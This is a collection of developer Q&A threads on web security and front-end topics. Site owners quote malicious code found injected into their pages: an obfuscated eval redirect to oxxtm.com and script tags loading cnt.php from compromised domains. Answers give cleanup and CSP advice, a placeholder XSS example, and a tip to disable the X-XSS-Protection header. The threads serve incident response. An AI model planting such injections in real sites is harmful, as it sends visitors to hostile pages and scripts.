My blog on wordpress gets the following malicious script injected:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))
It navigates to:
http://oxxtm.com/ which redirects to:
http://www.html5website.com/
I have already disabled a few plugins, but it seems like the problem is somewhere else, for I'm using the following plugins and they seem to have a good reputation:
Akismet
Captcha on Login
Free & Simple Contact Form Plugin - PirateForms (it is recommended by my Zerif Lite theme)
SMTP Mailer
WooCommerce
If I can't find the rootcause, would you recomend handling the "redirect" event to keep the site running? If so how could I handle if there is a redirect pointing to http://oxxtm.com/ and abort it using javascript?
I tried using the onunload and onbeforeunload events but it seems like the injected eval, runs before the event manipulation is even registered.
I can see that it gets injected on different PHP pages (sometimes only one sometimes more) in wordpress and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script.
I already removed the malicious script several times, but it gets injected again & again. I need to treat the symptom while I search for the cause or the site will be out of service. However, I don't understand how the script is injected in the first place.
Search with in all your files the following content: eval(function()
It will show you every files that contains this code.
Otherwise, try to search this: base64_decode
This is a function that permit to decode a base64-encoded text, which is often used by malicious PHP files to inject some code that you can't detect by searching eval(
If the problem persists, answer here and I'll try to help you.
Also, as additional feature to protect your client-side from XSS like that, i can suggest you to use CSP after cleaning your backend from injection. You can read more about it: https://developer.mozilla.org/en/docs/Web/Security/CSP It's not a silver-bullet, but nice to have it for protection of users.
Related
Is there a way to configure PHP/server (over Nginx php-fpm) to prevent javascript execution from php file_get_contents?
right now, if I allow users to upload html files with js embedded, JS get executed when file is displayed through file_get_contents() call.
I plan to add HTML filtering (ie deny html upload) but it will be even better if I can have a second layer of security on the ouput, instead of only on the upload (in case the first layer failed to take into account so scenario).
Thanks
Kudos to jcubic for providing a link to an explanation of why his solution won't work ;)
There are only 2 robust solutions I know of:
1) use a markup language other than HTML which has a provable grammar and does not allow embedded scripting (BBCode?). This still requires that you validate the submission for compliance - but is simpler than for HTML.
2) apply a content security policy which does not allow inline javascript - this would be my preferred solution, not least because you can specify a reporting URL, allowing you to police what is happenning on the browser rather than relying on filtering on the server.
You can try to strip JavaScript before you echo the content of the file:
echo preg_replace("%<script[^>]*>.*</script>%si", "", file_get_contents());
or you can call this when you upload the file so you don't have to do that each time.
you may also want to remove events like onclick and style that have url with javascript: protocol, to remove those you probably be better with a xml parser.
Here is a list of XSS vectors attacks that you can take into account: XSS Filter Evasion Cheat Sheet
My application uses AngularJS for frontend and .NET for the backend.
In my application I have a list view. On clicking each list item, It will fetch a pre rendered HTML page from S3.
I am using angular state.
app.js
...
state('staticpage', {
url: "/staticpage",
templateUrl: function (){
return 'http://xxxxxxx.cloudfront.net/staticpage/staticpage1.html';
},
controller: 'StaticPageCtrl',
title: 'Static Page'
})
StaticPage1.html
<div>
Hello static world 1!
<div>
How do I do SEO here?
Do I really need to do HTML snapshot using PanthomJS or so.
Yes PhantomJS would do the trick or you can use prerender.io with that service you can just use their open source renderer and have your own server.
Another way is to use _escaped_fragment_ meta tag
I hope this helps, if you have any questions add comments and I will update my answer.
Do you know that google renders html pages and executes javascript code in the page and does not need any pre-rendering anymore?
https://webmasters.googleblog.com/2014/05/understanding-web-pages-better.html
And take a look at these :
http://searchengineland.com/tested-googlebot-crawls-javascript-heres-learned-220157
http://wijmo.com/blog/how-to-improve-seo-in-angularjs-applications/
My project front-end also has biult on top of Angular and I decieded to solve SEO issue like this:
I've created an endpiont for all search engines (SE) where all the requests go with _escaped_fragment_ parameter;
I parse a HTTP Request for _escaped_fragment_ GET parameter;
I make cURL request with parsed category and article parameters and get the article content;
Then I render a simpliest (and seo friendly) template for SE with the article content or throw a 404 Not Found Exception if article does not exists;
In total: I do not need to prerender some html pages or use prrender.io, have a nice user interface for my users and Search Engines index my pages very well.
P.S. Do not forget to generate sitemap.xml and include there all urls (with _escaped_fragment_) wich you want to be indexed.
P.P.S. Unfortunately my project's back-end has built on top of php and can not show you suitable example for you. But if you want more explanations do not hesitate to ask.
Firstly you can not assume anything.
Google does say that there bots can very well understand javascript application but that is not true for all scenarios.
Start from using crawl as google feature from the webmaster for your link and see if page is rendered properly. If yes, then you need not read further.
In case, you see just your skeleton HTML, this is because google bot assumes page load complete before it actually completes. To fix this you need an environment where you can recognize that a request is from a bot and you need to return it a prerendered page.
To create such environment, you need to make some changes in code.
Follow the instructions Setting up SEO with Angularjs and Phantomjs
or alternatively just write code in any server side language like PHP to generate prerendered HTML pages of your application.
(Phantomjs is not mandatory)
Create a redirect rule in your server config which detects the bot and redirects the bot to prerendered plain html files (Only thing you need to make sure is that the content of the page you return should match with the actual page content else bots might not consider the content authentic).
It is to be noted that you also need to consider how will you make entries to sitemap.xml dynamically when you have to add pages to your application in future.
In case you are not looking for such overhead and you are lacking time, you can surely follow a managed service like prerender.
Eventually bots will get matured and they would understand your application and you will say goodbye to your SEO proxy infrastructure. This is just for time being.
At this point in time, the question really becomes somewhat subjective, at least with Google -- it really depends on your specific site, like how quickly your pages render, how much content renders after the DOM loads, etc. Certainly (as #birju-shaw mentions) if Google can't read your page at all, you know you need to do something else.
Google has officially deprecated the _escaped_fragment_ approach as of October 14, 2015, but that doesn't mean you might not want to still pre-render.
YMMV on trusting Google (and other crawlers) for reasons stated here, so the only definitive way to find out which is best in your scenario would be to test it out. There could be other reasons you may want to pre-render, but since you mentioned SEO specifically, I'll leave it at that.
If you have a server-side templating system (php, python, etc.) you can implement a solution like prerender.io
If you only have AngularJS-only files hosted on a static server (e.g. amazon s3) => Have a look at the answer in the following post : AngularJS SEO for static webpages (S3 CDN)
yes you need to prerender the page for the bots, prrender.io
can be used and your page must have the
meta tag
<meta name="fragment" content="!">
My website all the html and js files are affected by some scripts.
The below script inside all the html files.
<!--937592--><script type="text/javascript" src="http://jamesdeocariza.com/cnt.php?id=5653691"></script><!--/937592-->
and the below script inside all the js files.
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
I don't know how this code inside all the html and js files. This <!--937592--> number and the src="http://jamesdeocariza.com/cnt.php?id=5653691" src url is not static. it's dynamic number and url.
Is this Cross Side Script (XSS) Attack?
If you are not the owner of the server jamesdeocariza.com and brilleandmore.de then it looked like your server was hacked and someone injected the above code into all of your HTML and JavaScript files.
To explain XSS attacks: Imagine you have a bad written PHP file which contains code like:
<p>Your username <?php echo $_GET["user"] ?></p>
Now someone can write a malicious formed link to your site like http://example.com/index.php?user=<script>//bad things</script>. If someone clicks on such a link the server would serve an HTML document with
<p>Your username <script>//bad things</script></p>
(In reallity the link will be encoded using the URL encoding with %XY)
In your case it seems worse than just a XSS attack, because it seems that the attacker somehow could change the source code of your site. This may happen in many ways like hacking your PC or your server (maybe you have an virus on your PC). Getting access to your source repository (for example brute forcing the password of your github account) or you had a man in the middle while a unencrypted FTP upload...
Your files are somehow compromised and the next steps you need are:
Remove the above 2 code snippets from your js and HTML files(all) immediately.
Check whether your site has been blacklisted by Google using tools like Sucuri and findout which other files are affected and remove the unwanted code from those pages
If Google already blacklisted your website, you will have to request a review AFTER cleaning all the infected files
Search for unwanted dynamic codes which are probably there as a result of this compromising and remove those files.
Find out how the attack may have occurred and fix it(website access logs will come in handy here)
I am trying to clean up some files on a website, one task being to collate all references to jquery to a singular file.
Yes, it's a large site with multiple developers and some standards have not been followed resulting in the current situation where there are various versions of jquery referenced.
What I have tried to do is create a 301 redirect for these files to point to a single version.
eg: <script type="text/javascript" src="/someurl/js/jquery-1.4.4.min.js"> should end up pointing to /someurl/js/jquery-core.min.js
I have tried to do this but it appears to fail to load the new file and jquery does not exist, my net panel shows that the original file has a 301 on it and I can see the reference to the new one, however the "response" tab is empty.
Is it possible to use a 301 redirect in this way?
Thanks for any suggestions / feedback
p.s I know there are better ways to reference jquery etc but large company process and red tape stand in my way from doing this any other way
When a browser loads the script from the src attribute, it should follow all redirection links, in the same method it retrieves html, images, stylesheets, etc. So the use case you've provided should work.
But since it's not working for you, you have got a couple options to resolve your problem.
Use fiddler or a similar debugging proxy to see what's going on between your browser and the server. Perhaps the 301 is malformed, or perhaps the mime-type is misconfigured, it could be any number of things. Troubleshoot it the same way you'd troubleshoot any other issue where the browser isn't following redirects.
Or... instead of using redirects, you can use mod_rewrite (or a similar server-side URL rewriting tool) to modify the request for a particular version of a script to your canonical version.
In WebKit I get the following error on my JavaScript:
Refused to execute a JavaScript script. The source code of script found within request.
The code is for a JavaScript spinner, see ASCII Art.
The code used to work OK and is still working correctly in Camino and Firefox. The error only seems to be thrown when the page is saved via a POST and then retrieved via a GET. It happens in both Chrome/Mac and Safari/Mac.
Anyone know what this means, and how to fix this?
This "feature" can be disabled by sending the non-standard HTTP header X-XSS-Protection on the affected page.
X-XSS-Protection: 0
It's a security measure to prevent XSS (cross-site scripting) attacks.
This happens when some JavaScript code is sent to the server via an HTTP POST request, and the same code comes back via the HTTP response. If Chrome detects this situation, the script is refused to run, and you get the error message Refused to execute a JavaScript script. Source code of script found within request.
Also see this blogpost about Security in Depth: New Security Features.
Short answer: refresh the page after making your initial submission of the javascript, or hit the URL that will display the page you're editing.
Long answer: because the text you filled into the form includes javascript, and the browser doesn't necessarily know that you are the source of the javascript, it is safer for the browser to assume that you are not the source of this JS, and not run it.
An example: Suppose I gave you a link your email or facebook with some javascript in it. And imagine that the javascript would message all your friends my cool link. So, the game of getting that link to be invoked becomes simply, find a place to send the javascript such that it will be included in the page.
Chrome and other WebKit browsers try to mitigate this risk by not executing any javascript that is in the response, if it was present in the request. My nefarious attack would be thwarted because your browser would never run that JS.
In your case, you're submitting it into a form field. The Post of the form field will cause a render of the page that will display the Javascript, causing the browser to worry. If your javascript is truly saved, however, hitting that same page without submitting the form will allow it to execute.
As others have said, this happens when an HTTP response contains a JavaScript and/or HTML string that was also in the request. This is usually caused by entering JS or HTML into a form field, but can also be triggered in other ways such as manually tweaking the URL's parameters.
The problem with this is that someone with bad intentions could put whatever JS they want as the value, link to that URL with the malicious JS value, and cause your users trouble.
In almost every case, this can be fixed by HTML encoding the response, though there are exceptions. For example, this will not be safe for content inside a <script> tag. Other specific cases can be handled differently - for example, injecting input into a URL is better served by URL encoding.
As Kendall Hopkins mentioned, there may be a few cases when you actually want JavaScript from form inputs to be executed, such as creating an application like JSFiddle. In those cases, I'd recommend that you you at least scrub through the input in your backend code before blindly writing it back. After that, you can use the method he mentioned to prevent the XSS blockage (at least in Chrome), but be aware that it is opening you to attackers.
I used this hacky PHP trick just after I commit to database, but before the script is rendered from my _GET request.:
if(!empty($_POST['contains_script'])) {
echo "<script>document.location='template.php';</script>";
}
This was the cheapest solution for me.